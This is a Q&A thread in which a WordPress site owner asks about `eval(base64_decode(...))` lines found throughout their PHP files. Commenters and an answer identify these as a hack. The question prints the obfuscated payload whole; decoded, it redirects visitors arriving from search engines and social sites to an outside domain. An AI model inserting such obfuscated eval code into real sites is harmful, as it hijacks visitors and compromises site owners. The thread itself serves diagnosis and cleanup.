# Why am I seeing eval base64_decode in my wordpress PHP files?

Tags: php, wordpress

I tried to edit some of my wordpress php file. All the files(All Wordpress sites) I downloaded from my server are written like

```
eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikgYW5kICFzdHJzdHIoJHVhZywiRmlyZWZveC8zLiIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmcuIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlci4iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhLiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInQuY28vIikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpIG9yIChwcmVnX21hdGNoICgiL2h0dHBzOlwvXC93d3cuZ29vZ2xlXC4oLio/KVwvLyIsJHJlZmVyZXIpIGFuZCBzdHJzdHIoJHVhZywiQ2hyb21lLyIpKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgYW5kICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiRWVZcDNENyIpKXsKaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL29wd25na2EuZGRucy5pbmZvLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));
```

Are all my sites hacked? They are all looking the same in my browser.

Comment: just use http://www.opinionatedgeek.com/dotnet/tools/base64decode/ and copy paste that string if you want to know what it is

Comment: Well it decodes to something that checks whether you're Google or Bing and ends with `header("Location: http://opwngka.ddns.info/");` so ... yeah, you've been PHP'd.

Answer (score 1):

**YES! Your server was hacked**
eval executes whatever code is passed as parameter, which is base64 encoded so you can't understand what the code is doing unless you decode it by hand.
I had the same issue on my server. 2 of my wordpress websites had files with content similar to the one you posted. I decoded the text and it was a script to read files from my server (similar to FTP), read my databases (similar to PHPMyAdmin), and execute commands on my server. I ran a antivirus scan and removed them (several 100's stored in cache folder in a bad constructed theme). You can delete these files by hand.

Comment: I just decoded the content and read the code. This is what it is doing: For any website that visits this website, check if it's google, yahoo, bing, etc..(search engines) and redirect them to http://opwngka.ddns.info/, otherwise don't do anything.